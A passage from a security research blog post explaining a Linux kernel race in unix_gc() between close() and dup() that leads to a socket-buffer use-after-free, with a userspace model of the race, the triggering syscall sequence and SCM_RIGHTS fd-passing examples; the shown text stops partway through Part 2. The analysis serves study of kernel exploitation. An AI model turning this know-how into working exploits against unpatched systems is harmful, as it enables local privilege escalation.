<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!-- Google Analytics -->
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-114832940-2', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->
<title>IceSword Lab</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="IceSword Lab | 冰刃实验室">
<meta property="og:type" content="website">
<meta property="og:title" content="IceSword Lab">
<meta property="og:url" content="http://yoursite.com/index.html">
<meta property="og:site_name" content="IceSword Lab">
<meta property="og:description" content="IceSword Lab | 冰刃实验室">
<meta property="og:locale" content="zh_CN">
<meta property="article:author" content="IceSword Lab">
<meta name="twitter:card" content="summary">
<link rel="alternate" href="/atom.xml" title="IceSword Lab" type="application/atom+xml">
<link rel="icon" href="/favicon.ico">
<link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="css/style.css">
<meta name="generator" content="Hexo 4.2.0"></head>
<body>
<div id="container">
<div id="wrap">
<header id="header">
<div id="banner"></div>
<div id="header-outer" class="outer">
<div id="header-title" class="inner">
<h1 id="logo-wrap">
<a href="index.html" id="logo">IceSword Lab</a>
</h1>
<h2 id="subtitle-wrap">
<a href="index.html" id="subtitle">Work hard in silence, let success make the noise.</a>
</h2>
</div>
<div id="header-inner" class="inner">
<nav id="main-nav">
<a id="main-nav-toggle" class="nav-icon"></a>
<a class="main-nav-link" href="index.html">Home</a>
<a class="main-nav-link" href="/archives">Archives</a>
<a class="main-nav-link" href="/research">Research</a>
<a class="main-nav-link" href="/vulnerabilities">Vulnerabilities</a>
<a class="main-nav-link" href="/recruitment">Recruitment</a>
<a class="main-nav-link" href="/about">About</a>
</nav>
<nav id="sub-nav">
<a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
<a id="nav-search-btn" class="nav-icon" title="Search"></a>
</nav>
<div id="search-form-wrap">
<form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit"></button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
</div>
</div>
</div>
</header>
<div class="outer">
<section id="main">
<article id="post-2023/03/10/race_windown" class="article article-type-post" itemscope itemprop="blogPost">
<div class="article-meta">
<a href="2023/03/10/race_windown/" class="article-date">
<time datetime="2023-03-10T14:00:00.000Z" itemprop="datePublished">2023-03-10</time>
</a>
</div>
<div class="article-inner">
<header class="article-header">
<h1 itemprop="name">
<a class="article-title" href="2023/03/10/race_windown/">Linux Kernel Exploitation Techniques: Racing against the clock</a>
</h1>
</header>
<div class="article-entry" itemprop="articleBody">
<p>Author: 熊潇 (Xiong Xiao) of <a href="https://www.iceswordlab.com/about/" target="_blank" rel="noopener">IceSword Lab</a></p>
<h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>Overview</h2><p>Original article: <strong><a href="https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html" target="_blank" rel="noopener">Racing against the clock – hitting a tiny kernel race window</a></strong></p>
<ul>
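<li>Part.1: A brief explanation of the vulnerability</li>
<li>Part.2: Added detail on the points that most easily cause confusion</li>
<li>Part.3: An analysis of the techniques the article uses to win the race more reliably</li>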
</ul>
<h2 id="Part-1"><a href="#Part-1" class="headerlink" title="Part.1"></a>Part.1</h2><p><strong>The bug & race</strong> </p>
<blockquote>
<p>The kernel tries to figure out whether it can account for all references to some file by comparing the file’s refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.</p>
<p>The problem is that struct file can also be referenced from an RCU read-side critical section (which you can’t detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using <code>get_file_rcu()</code> / <code>get_file_rcu_many()</code> by <code>__fget_files()</code> as long as the refcount is non-zero.</p>
</blockquote>
<ul>
<li>The intended logic of <code>unix_gc()</code> is: if <code>total_refs</code> equals <code>inflight_refs</code>, the <code>file</code> is considered to be held exclusively by in-flight SKBs at that moment, so the <code>skb</code> and the <code>file</code> can be freed together</li>
<li>In the code below, the race is won if (3) executes between (1) and (2)</li>
<li>If the race is lost, <code>__fget_files()</code> finds that either <code>f_count</code> is 0 or <code>file</code> is NULL</li>
<li>If the race is won, however, <code>__fget_files()</code> increments <code>file->f_count</code>. The rest of <code>unix_gc()</code> therefore does not free the <code>file</code>'s memory and only decrements <code>f_count</code>. This also means that <code>dup()</code> can still succeed after <code>close()</code></li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">dup() -> __fget_files()</span><br><span class="line">    file = files_lookup_fd_rcu(files, fd);            <span class="comment">// fdt->fd[fd] (1)</span></span><br><span class="line">    ...</span><br><span class="line">    get_file_rcu_many(file, refs)                     <span class="comment">// update: f_count+1 (2)</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">close</span>() -> unix_gc()</span><br><span class="line">    list_for_each_entry_safe(u, next, &gc_inflight_list, link) {</span><br><span class="line">        total_refs = file_count(u->sk.sk_socket->file);  <span class="comment">// read f_count: 1 (3)</span></span><br><span class="line">        inflight_refs = atomic_long_read(&u->inflight);  <span class="comment">// inflight_refs: 1</span></span><br><span class="line">        ...</span><br><span class="line">        <span class="keyword">if</span> (total_refs == inflight_refs) {               <span class="comment">// compare</span></span><br><span class="line">            list_move_tail(&u->link, &gc_candidates);</span><br><span class="line">            ...</span><br></pre></td></tr></table></figure>
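<p>To make the interleaving concrete, here is a small userspace model of the orderings described in the bullets above. It is a sketch under simplifying assumptions and is not kernel code. <code>struct model_file</code>, <code>run()</code> and the other <code>model_*</code> helpers are hypothetical, and a plain <code>long</code> stands in for <code>file->f_count</code>. There is no real concurrency or RCU. The model's state starts after <code>close()</code> has removed the fd-table reference, so only the in-flight reference (<code>inflight_refs == 1</code>) remains, and the <code>dup()</code> side has already done step (1).</p>
<figure class="highlight c"><table><tr><td class="code"><pre>#include <stdbool.h>
#include <stdio.h>

/* Hypothetical userspace model of the close()/dup() race; not kernel code. */
struct model_file {
    long f_count;   /* stands in for file->f_count */
    bool freed;     /* set when the last reference is dropped */
};

struct outcome {
    bool dup_ok;        /* did the dup() side get a reference? */
    bool gc_collected;  /* did unix_gc() treat the socket as garbage? */
    bool file_freed;    /* was the file freed at the end? */
    long final_count;   /* f_count at the end */
};

enum order { GC_FIRST, DUP_FIRST, RACE_1_3_2 };

/* Step (2): like get_file_rcu_many(), only succeeds while f_count != 0.
 * (Roughly: in the kernel, RCU keeps the memory readable after the free.) */
static bool model_get_file(struct model_file *f)
{
    if (f->f_count == 0)
        return false;
    f->f_count++;
    return true;
}

/* Drop one reference, like fput(). */
static void model_fput(struct model_file *f)
{
    if (--f->f_count == 0)
        f->freed = true;
}

/* Step (3) plus the decision: sample f_count and compare it with inflight. */
static bool model_gc_check(const struct model_file *f, long inflight_refs)
{
    long total_refs = f->f_count;
    return total_refs == inflight_refs;
}

static struct outcome run(enum order order)
{
    /* Only the in-flight reference held via the skb is left. */
    struct model_file f = { .f_count = 1, .freed = false };
    const long inflight_refs = 1;
    struct outcome o = { false, false, false, 0 };

    switch (order) {
    case GC_FIRST:   /* (3) and the purge complete before (2): race lost */
        o.gc_collected = model_gc_check(&f, inflight_refs);
        if (o.gc_collected)
            model_fput(&f);
        o.dup_ok = model_get_file(&f);
        break;
    case DUP_FIRST:  /* (2) completes before (3): no race */
        o.dup_ok = model_get_file(&f);
        o.gc_collected = model_gc_check(&f, inflight_refs);
        if (o.gc_collected)
            model_fput(&f);
        break;
    case RACE_1_3_2: /* (3) samples f_count between (1) and (2): race won */
        o.gc_collected = model_gc_check(&f, inflight_refs);
        o.dup_ok = model_get_file(&f);
        if (o.gc_collected)
            model_fput(&f);   /* gc drops the in-flight reference */
        break;
    }
    o.file_freed = f.freed;
    o.final_count = f.f_count;
    return o;
}

int main(void)
{
    static const char *const names[] = { "gc first", "dup first", "race (1)(3)(2)" };
    for (int i = GC_FIRST; i <= RACE_1_3_2; i++) {
        struct outcome o = run((enum order) i);
        printf("%-15s dup_ok=%d gc_collected=%d file_freed=%d f_count=%ld\n",
               names[i], o.dup_ok, o.gc_collected, o.file_freed, o.final_count);
    }
    return 0;
}
</pre></td></tr></table></figure>
<p>In the race ordering, the model ends with the garbage collector having decided it owned every reference and dropped the in-flight one. Meanwhile, the <code>dup()</code> side still holds the file with <code>f_count == 1</code>. This is the inconsistent state the bullets above describe.</p>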
<p><strong>What can happen because unix_gc() does not free the file and the skb together?</strong></p>
<p>The following sequence can trigger a UAF on the skb:</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">socketpair()       <span class="comment">// get a socket pair: fds 3 and 4</span></span><br><span class="line">sendmsg(<span class="number">4</span>, <span class="number">3</span>)      <span class="comment">// send fd 3 over fd 4</span></span><br><span class="line">  -> skb_queue_tail(&other->sk_receive_queue, skb); <span class="comment">// other is fd 4's peer, i.e. fd 3; the skb holds what fd 4 sent, which is fd 3 itself</span></span><br><span class="line"><span class="built_in">close</span>(<span class="number">3</span>) | dup(<span class="number">3</span>)  <span class="comment">// close and dup race; if dup wins the race, it returns fd 3</span></span><br><span class="line">recvmsg(<span class="number">3</span>)         <span class="comment">// receive on fd 3 the skb sent by fd 4</span></span><br><span class="line">  -> last = skb = skb_peek(&sk->sk_receive_queue); <span class="comment">// by now the memory backing this skb has already been freed</span></span><br></pre></td></tr></table></figure>
<p>skb UAF:</p>
<ul>
<li>allocated in: <code>sendmsg() -> unix_stream_sendmsg()</code></li>
<li>freed in: <code>close() -> unix_gc()</code></li>
<li>used after free in: <code>recvmsg() -> unix_stream_read_generic()</code></li>
</ul>
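<p>The syscall side of this sequence can be reproduced from userspace without any race. The sketch below assumes Linux and uses hypothetical helpers <code>send_fd()</code>, <code>recv_fd()</code> and <code>self_send_roundtrip()</code>. It sends <code>sv[0]</code> over <code>sv[1]</code>, so <code>sv[0]</code> sits in flight in its own receive queue (the <code>sendmsg(4, 3)</code> step). It then receives it back on <code>sv[0]</code> (the <code>recvmsg(3)</code> step). The <code>close(3) | dup(3)</code> race is deliberately left out, so this only shows the normal path the exploit builds on.</p>
<figure class="highlight c"><table><tr><td class="code"><pre>#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/uio.h>
#include <unistd.h>

/* Hypothetical helper: send one fd (plus one data byte) with SCM_RIGHTS. */
static int send_fd(int sock, int fd)
{
    char byte = 'x';
    struct iovec io = { .iov_base = &byte, .iov_len = 1 };
    union { char buf[CMSG_SPACE(sizeof(int))]; struct cmsghdr align; } ctl;
    memset(&ctl, 0, sizeof(ctl));
    struct msghdr msg = { .msg_iov = &io, .msg_iovlen = 1,
                          .msg_control = ctl.buf, .msg_controllen = sizeof(ctl.buf) };
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Hypothetical helper: receive one fd; returns the new fd or -1. */
static int recv_fd(int sock)
{
    char byte;
    struct iovec io = { .iov_base = &byte, .iov_len = 1 };
    union { char buf[CMSG_SPACE(sizeof(int))]; struct cmsghdr align; } ctl;
    struct msghdr msg = { .msg_iov = &io, .msg_iovlen = 1,
                          .msg_control = ctl.buf, .msg_controllen = sizeof(ctl.buf) };
    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    struct cmsghdr *cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS)
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}

/* Returns 1 if the fd received on sv[0] refers to sv[0] itself, 0 if not, -1 on error. */
static int self_send_roundtrip(void)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1)
        return -1;
    /* like sendmsg(4, 3): sv[0] is now in flight in its own receive queue */
    if (send_fd(sv[1], sv[0]) == -1)
        return -1;
    /* like recvmsg(3): take the skb off sv[0]'s queue, installing a new fd */
    int got = recv_fd(sv[0]);
    if (got == -1)
        return -1;
    struct stat a, b;
    int same = fstat(sv[0], &a) == 0 && fstat(got, &b) == 0 &&
               a.st_dev == b.st_dev && a.st_ino == b.st_ino;
    close(got);
    close(sv[0]);
    close(sv[1]);
    return same;
}

int main(void)
{
    int r = self_send_roundtrip();
    printf("received fd refers to sv[0]: %s\n", r == 1 ? "yes" : "no");
    return r == 1 ? 0 : 1;
}
</pre></td></tr></table></figure>
<p>Comparing <code>st_dev</code>/<code>st_ino</code> from <code>fstat()</code> is just a convenient way to confirm that both descriptors name the same open socket. Error paths in this sketch do not close descriptors they already opened.</p>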
<h2 id="Part-2"><a href="#Part-2" class="headerlink" title="Part.2"></a>Part.2</h2><h3 id="SCM-RIGHTS-unix-socket"><a href="#SCM-RIGHTS-unix-socket" class="headerlink" title="SCM_RIGHTS unix socket"></a>SCM_RIGHTS unix socket</h3><blockquote>
<p><code>SCM_RIGHTS</code> is a <strong>socket control message</strong> used for <strong>passing file descriptors</strong> between processes over a UNIX domain socket.</p>
<p>It allows a process to send an open file descriptor to another process, which can then use the file descriptor to read or write to the same file or device.</p>
</blockquote>
<ul>
<li><p>example</p>
<ul>
<li><p>sender.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/socket.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/types.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/stat.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><fcntl.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><errno.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/un.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>{</span><br><span class="line"> 
<span class="keyword">if</span> (argc < <span class="number">2</span>) {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Usage: %s <file_path>\n"</span>, argv[<span class="number">0</span>]);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">char</span> *file_path = argv[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> sock = socket(AF_UNIX, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (sock == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"socket"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_un</span> <span class="title">addr</span>;</span></span><br><span class="line"> <span class="built_in">memset</span>(&addr, <span class="number">0</span>, <span class="keyword">sizeof</span>(addr));</span><br><span class="line"> addr.sun_family = AF_UNIX;</span><br><span class="line"> <span class="built_in">strncpy</span>(addr.sun_path, <span class="string">"/tmp/file_transfer.sock"</span>, <span class="keyword">sizeof</span>(addr.sun_path) - <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">connect</span>(sock, (struct sockaddr *) &addr, <span class="keyword">sizeof</span>(addr)) == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"connect"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span 
class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> fd = <span class="built_in">open</span>(file_path, O_RDONLY);</span><br><span class="line"> <span class="keyword">if</span> (fd == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"open"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">msghdr</span> <span class="title">msg</span> = {</span><span class="number">0</span>};</span><br><span class="line"> <span class="keyword">char</span> buf[CMSG_SPACE(<span class="keyword">sizeof</span>(fd))];</span><br><span class="line"> <span class="built_in">memset</span>(buf, <span class="number">0</span>, <span class="keyword">sizeof</span>(buf));</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">iovec</span> <span class="title">io</span> = {</span> .iov_base = <span class="string">"hello"</span>, .iov_len = <span class="number">5</span> };</span><br><span class="line"> msg.msg_iov = &io;</span><br><span class="line"> msg.msg_iovlen = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> msg.msg_control = buf;</span><br><span class="line"> msg.msg_controllen = <span class="keyword">sizeof</span>(buf);</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">cmsghdr</span> *<span class="title">cmsg</span> = <span class="title">CMSG_FIRSTHDR</span>(&<span class="title">msg</span>);</span></span><br><span class="line"> cmsg->cmsg_level = SOL_SOCKET;</span><br><span class="line"> cmsg->cmsg_type = SCM_RIGHTS;</span><br><span 
class="line"> cmsg->cmsg_len = CMSG_LEN(<span class="keyword">sizeof</span>(fd));</span><br><span class="line"> *((<span class="keyword">int</span> *) CMSG_DATA(cmsg)) = fd;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (sendmsg(sock, &msg, <span class="number">0</span>) == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"sendmsg"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="built_in">close</span>(fd);</span><br><span class="line"> <span class="built_in">close</span>(sock);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
</li>
<li><p>recver.c</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/socket.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/types.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><sys/stat.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><fcntl.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><unistd.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><string.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><errno.h></span></span></span><br><span class="line"><span class="meta">#<span 
class="meta-keyword">include</span> <span class="meta-string"><sys/un.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> *argv[])</span> </span>{</span><br><span class="line"> <span class="keyword">int</span> sock = socket(AF_UNIX, SOCK_STREAM, <span class="number">0</span>);</span><br><span class="line"> <span class="keyword">if</span> (sock == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"socket"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">sockaddr_un</span> <span class="title">addr</span>;</span></span><br><span class="line"> <span class="built_in">memset</span>(&addr, <span class="number">0</span>, <span class="keyword">sizeof</span>(addr));</span><br><span class="line"> addr.sun_family = AF_UNIX;</span><br><span class="line"> <span class="built_in">strncpy</span>(addr.sun_path, <span class="string">"/tmp/file_transfer.sock"</span>, <span class="keyword">sizeof</span>(addr.sun_path) - <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (bind(sock, (struct sockaddr *) &addr, <span class="keyword">sizeof</span>(addr)) == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"bind"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">listen</span>(sock, <span class="number">1</span>) 
== <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"listen"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> client_sock = accept(sock, <span class="literal">NULL</span>, <span class="literal">NULL</span>);</span><br><span class="line"> <span class="keyword">if</span> (client_sock == <span class="number">-1</span>) {</span><br><span class="line"> perror(<span class="string">"accept"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">char</span> buf[<span class="number">256</span>];</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">iovec</span> <span class="title">io</span> = {</span> .iov_base = buf, .iov_len = <span class="keyword">sizeof</span>(buf) };</span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">msghdr</span> <span class="title">msg</span> = {</span></span><br><span class="line"> .msg_iov = &io,</span><br><span class="line"> .msg_iovlen = <span class="number">1</span></span><br><span class="line"> };</span><br><span class="line"></span><br><span class="line"> <span class="keyword">char</span> control[CMSG_SPACE(<span class="keyword">sizeof</span>(<span class="keyword">int</span>))];</span><br><span class="line"> msg.msg_control = control;</span><br><span class="line"> msg.msg_controllen = <span class="keyword">sizeof</span>(control);</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (recvmsg(client_sock, &msg, <span class="number">0</span>) == <span class="number">-1</span>) {</span><br><span class="line"> 
perror(<span class="string">"recvmsg"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="class"><span class="keyword">struct</span> <span class="title">cmsghdr</span> *<span class="title">cmsg</span> = <span class="title">CMSG_FIRSTHDR</span>(&<span class="title">msg</span>);</span></span><br><span class="line"> <span class="keyword">if</span> (cmsg == <span class="literal">NULL</span> || cmsg->cmsg_level != SOL_SOCKET || cmsg->cmsg_type != SCM_RIGHTS) {</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Invalid message\n"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">int</span> fd = *((<span class="keyword">int</span> *) CMSG_DATA(cmsg));</span><br><span class="line"> <span class="keyword">if</span> (fd == <span class="number">-1</span>) {</span><br><span class="line"> <span class="built_in">fprintf</span>(<span class="built_in">stderr</span>, <span class="string">"No file descriptor received\n"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Do something with the received file descriptor</span></span><br><span class="line"> <span class="keyword">char</span> buf2[<span class="number">256</span>];</span><br><span class="line"> <span class="keyword">ssize_t</span> bytes_read;</span><br><span class="line"> <span class="keyword">while</span> ((bytes_read = <span class="built_in">read</span>(fd, buf2, <span class="keyword">sizeof</span>(buf2))) > <span class="number">0</span>) {</span><br><span class="line"> <span class="built_in">fwrite</span>(buf2, <span class="number">1</span>, (<span class="keyword">size_t</span>) bytes_read, <span class="built_in">stdout</span>); <span class="comment">// buf2 is not NUL-terminated, so write exactly bytes_read bytes</span></span><br><span class="line"> }</span><br><span
class="line"> </span><br><span class="line"> <span class="built_in">close</span>(fd);</span><br><span class="line"> <span class="built_in">close</span>(client_sock);</span><br><span class="line"> <span class="built_in">close</span>(sock);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
</li>
</ul>
</li>
</ul>
<h3 id="Unix-socket-sendmsg-and-recvmsg"><a href="#Unix-socket-sendmsg-and-recvmsg" class="headerlink" title="Unix socket sendmsg() and recvmsg()"></a>Unix socket <code>sendmsg()</code> and <code>recvmsg()</code></h3><ul>
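<li>The main kernel handlers for sending and receiving <code>SCM_RIGHTS</code> data on a Unix stream socket are <code>unix_stream_sendmsg</code> and <code>unix_stream_read_generic</code></li>
<li>What is special about them:<ul>
<li><code>sendmsg</code> allocates an <code>skb</code> and appends it to the receiver's <code>sk_receive_queue</code>; when a passed fd is itself a Unix socket, its <code>unix_sock</code> is also added to the global <code>gc_inflight_list</code></li>
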